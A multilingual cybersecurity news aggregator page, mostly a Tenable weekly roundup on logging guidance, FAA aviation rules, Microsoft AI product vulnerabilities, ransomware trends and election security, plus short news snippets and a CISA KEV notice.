Aggregator

Collaboration with security teams, making cybersecurity a core principle of business strategy, and investing in defenses better position organizations to thwart threats and ensure business continuity.

Новая брешь обнаружена всего через неделю после предыдущей уязвимости в том же продукте.

The federal police in Argentina (PFA) have arrested a 29-year-old Russian national in Buenos Aires, who is facing money laundering charges related to cryptocurrency proceeds of the notorious North Korean hackers' Lazarus Group.' [...]

The US government has filed a lawsuit against Georgia Tech for alleged cybersecurity violations as a Department of Defense contractor

This post walks through the vulnerabilities we disclosed affecting Gradio, and our work with Hugging Face to harden the Spaces platform after a recently reported potential breach.

The post NTLM Credential Theft in Python Windows Applications appeared first on Horizon3.ai.

The post NTLM Credential Theft in Python Windows Applications appeared first on Security Boulevard.

Het logistiek- en bevoorradingsschip Zr.Ms. Karel Doorman is teruggekeerd van de EU-operatie Aspides in de Rode Zee. Het schip heeft bijgedragen aan de bescherming van internationale scheepvaart tegen de dreiging van Houthi’s. Vandaag kwam de Karel Doorman aan in Den Helder.

Authorities nab crypto and extortion criminals, cloud hacktool identified in spam SMS attacks, and DPRK actors exploit Windows zero-day.

The post The Good, the Bad and the Ugly in Cybersecurity – Week 34 appeared first on SentinelOne.

Looking to sharpen your team’s event logging and threat detection? A new guide offers plenty of best practices. Plus, the FAA wants airplanes to be more resilient to cyberattacks. Meanwhile, check out the critical vulnerabilities Tenable discovered in two Microsoft AI products. And get the latest on ransomware trends, vulnerability management practices and election security!

Dive into six things that are top of mind for the week ending August 23.

1 - Guide outlines logging and threat detection best practices

As attackers double down on the use of stealthy, hard-to-detect “living off the land” (LOTL) techniques, cybersecurity teams should improve how they log events and detect threats. That’s the call government agencies from multiple countries made in a joint guide published this week and titled “Best Practices for Event Logging and Threat Detection.” 

“Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility,” reads the guide, which was developed by the Australian Cyber Security Centre (ACSC).

 

The guide, whose intended audience includes senior IT and operational technology (OT) leaders and operators, network administrators and critical infrastructure providers, groups its best practices under four categories:

• Enterprise-approved event logging policy, which includes event-log quality and the consistency of content, formats and timestamps
• Centralized log collection and correlation, which focuses on logging priorities for enterprise networks, OT systems, mobile devices and cloud environments
• Secure storage and event-log integrity, which touches on protecting logs from unauthorized access, modification and deletion
• Detection strategy for relevant threats, which deals with LOTL techniques, such as attackers’ use of legitimate tools and capabilities in the breached environment

The guide’s recommendations can help “detect malicious activity, behavioral anomalies, and compromised networks, devices, or accounts,” reads a statement from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which collaborated with the ACSC, along with cyber agencies from seven other countries.

To get more details, check out:

• CISA’s announcement
• The full 17-page guide “Best Practices for Event Logging and Threat Detection”

For more information about event logging and threat detection:

• “Security log management and logging best practices” (TechTarget)
• “Logging Cheat Sheet” (OWASP)
• “Network security logging and monitoring” (Canadian Centre for Cyber Security)
• “Introduction to logging for security purposes” (U.K. NCSC)

2 - FAA wants to tighten aviation cyber rules

To beef up the aviation sector’s cyber defenses, the U.S. government this week proposed new cybersecurity rules for airplanes, engines and propellers as they become increasingly connected to computer networks and services.

In a proposed rulemaking notice, the U.S. Federal Aviation Administration (FAA) said some of its regulations are “inadequate and inappropriate to address the cybersecurity vulnerabilities caused by increased interconnectivity.”

Current designs for airplanes can make them vulnerable to cyber risks from maintenance laptops; airport or airline networks; the internet; wireless sensors and their networks; USB devices; and cellular and satellite systems and communications; and more.

 

 

The proposed new and revised rules seek to protect airplanes, engines and propellers from “intentional unauthorized electronic interactions” (IUEI) so the FAA wants to require product designers and makers to “identify” and “assess” IUEI risks and mitigate them.

To that end, they would need to conduct a security risk analysis to identify all cyberthreats, assess threat severity, determine exploitation likelihood and mitigate these security issues.

The proposed rules are now open for public comment.

To get more details, check out the 36-page notice of proposed rulemaking titled “Equipment, Systems, and Network Information Security Protection.”

For more information about aviation cybersecurity:

• “TSA, FAA Requirements Emphasize Cybersecurity for Airport and Aircraft Operators and Airport Terminal Projects” (Tenable)
• “Aviation Cybersecurity: Risks and Mitigations” (National Business Aviation Association)
• “Why aviation needs to prioritise cybersecurity” (Airport World)
• “Protecting The Aviation Sector From Cyberattacks” (Tenable)

3 - Tenable finds critical vulnerabilities in two Microsoft AI products

Tenable Research recently discovered critical vulnerabilities in Microsoft’s Azure Health Bot Service and Copilot Studio.

In the case of Azure Health Bot Service, a cloud platform for deploying AI-powered virtual health assistants, the critical vulnerabilities allowed researchers access to cross-tenant resources within this service. 

Meanwhile, a server-side request forgery (SSRF) vulnerability in Copilot Studio allowed researchers access to potentially sensitive information regarding service internals with potential cross-tenant impact. With Copilot Studio, you can build custom Copilot conversational applications for performing large language model (LLM) and generative AI tasks.

 

 

To get all the details, read these Tenable blogs:

• “SSRFing the Web with the Help of Copilot Studio”
• “Compromising Microsoft's AI Healthcare Chatbot Service”

You can also find media coverage of the two discoveries here:

Copilot Studio

• “Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data” (Dark Reading)
• “Microsoft Copilot Studio Vulnerability Led to Information Disclosure” (SecurityWeek)
• “Microsoft Patches Critical Copilot Studio Vulnerability Exposing Sensitive Data” (The Hacker News)

Azure Health Bot Service

• “Microsoft's AI Health Bot required patching for privilege vulnerability” (Healthcare IT News)
• “Fix for Azure Health Bot vulnerabilities prevents exploitation” (TechTarget)
• “Microsoft Azure AI Health Bot Infected With Critical Vulnerabilities” (Dark Reading)

4 - Tenable polls webinar attendees on VM practices

During our recent webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable,” we polled attendees on their biggest VM challenge and on patching prioritization. Check out what they said!

(231 webinar attendees polled by Tenable, August 2024)

(234 webinar attendees polled by Tenable, August 2024)

Want to learn how to improve key vulnerability management practices, including remediation prioritization? Watch this on-demand webinar “From Frustration to Efficiency: Optimize Your Vuln Management Workflows and Security with Tenable.”

5 - Report: Ransomware attacks jumped in July, as attackers turn to infostealer malware

Ransomware attacks spiked 20% globally in July, compared with June, as the RansomHub gang emerged as the most active group.

However, ransomware attacks were down compared with July 2023, and “remain much lower” compared with the activity observed between February to May of this year.

That’s according to the “Monthly Threat Pulse” report for July 2024, published this week by NCC Group’s Global Threat Intelligence team.

“Whether this increase reflects the start of an upward trend remains to be seen,” the report reads.

Global Ransomware Attacks by Month 2023 - 2024

(Source: “Monthly Threat Pulse” report from NCC Group, August 2024)

The industrials sector was the hardest hit, receiving about a third of all attacks, a clear sign of ransomware groups’ strong interest in breaching critical-infrastructure organizations, the report says.

Ransomware groups pounced on CVE-2024-37085, an authentication-bypass vulnerability in the VMware ESXi hypervisor product, a reminder that organizations need to continue to prioritize patching high-risk bugs.

While vulnerability exploitation remains a popular tactic for ransomware attackers, they’re also increasing their use of information stealer malware, which offers them a “far easier, faster and often cheaper” way to access a network via the use of stolen credentials, the report reads.

“The rise in sophisticated techniques, such as the use of information stealer malware in their pre-attack phase, highlights that cybercriminals are not standing still. As these threats evolve, so must our defences,” Ian Usher, Deputy Head of Threat Intelligence at NCC Group, said in a statement.

To get more details, check out:

• The report’s announcement
• The “Monthly Threat Pulse Review of July 2024”

For more information about ransomware trends:

• “Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)
• “Ransomware on track for record profits, even as fewer victims pay” (SC Magazine)
• “Ransom recovery costs reach $2.73 million” (Help Net Security)
• “Ransomware report finds 43% of data unrecoverable after attack” (SC Magazine)

6 - CISA: Ransomware won’t impact U.S. presidential election

Although ransomware gangs may try to disrupt the U.S. general election, their attacks won’t compromise the voting and counting processes, according to CISA and the FBI. At best, ransomware attacks would cause isolated delays and be minimally disruptive.

“The public should be aware that ransomware is extremely unlikely to affect the integrity of voting systems or the electoral process,” FBI Cyber Division Deputy Assistant Director Cynthia Kaiser said in a statement.

The reason: U.S. election officials have put in place what CISA and the FBI call a “multi-layer approach to security” with a variety of technical, physical and procedural safeguards.

“In the event of a ransomware event affecting their offices, election officials have plans and redundancies in place to allow voting operations to continue so that all eligible voters are able to cast their ballot securely,” reads a joint public-service announcement from CISA and the FBI.

To get more details, check out:

• CISA’s announcement “Ransomware Disruptions During Voting Periods Will Not Impact the Security and Resilience of Vote Casting or Counting”
• The joint PSA 

A developer that researchers now track as Greasy Opal, operating as a seemingly legitimate business, has been fueling the cybercrime-as-a-service industry with a tool that bypasses account security solutions and allows bot-led CAPTCHA solving at scale. [...]

CURKON показывает изощренный способ заражения компьютеров.

自 1970 年代以来，海洋吸收了世界上 90% 以上的多余热量和 1/3 的碳排放。但随着人类活动加剧，温室气体排放增加，近几十年来，海水温度持续攀升。今年 6 月，联合国教科文组织报告称，海洋变暖速度 20 年间增加了一倍。海洋温度升高显著影响了海洋生态系统。从 2023 年 1 月到 2024 年 5 月，全球至少 62 个国家和地区出现了大规模珊瑚礁白化事件——这是海水变暖的直接结果：当海洋温度比夏季长期温度高出约 1℃ 并持续 4—6 周后，就会出现珊瑚白化现象。与此同时藻华现象在世界各地泛滥。海水变暖会导致海平面上升。2023 年，全球平均海平面达到了自 1993 年有卫星记录以来的最高点。按照目前趋势，到 2050 年可能会再上升 20 厘米，增加沿海地区洪水发生的频率和严重程度。

All your tokens are belong to us！

分享近期值得关注的IOC

-TA453 利用新型 AnvilEcho 恶意软件攻击著名犹太人物 -网络安全威胁2024年中报告 -BlindEagle 针对拉丁美洲的攻击活动披露 -Sidewinder 组织针对巴基斯坦进行网络钓鱼

На что разработчики обращают внимание в 2024 году?

Невидимый вирус приходит вместе с вашим любимым актером.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

• CVE-2024-39717 Versa Director Dangerous File Type Upload Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Как старая добрая GTA IV послужила приманкой для маскировки нового вируса.

Критические уязвимости угрожают нацбезопасности США.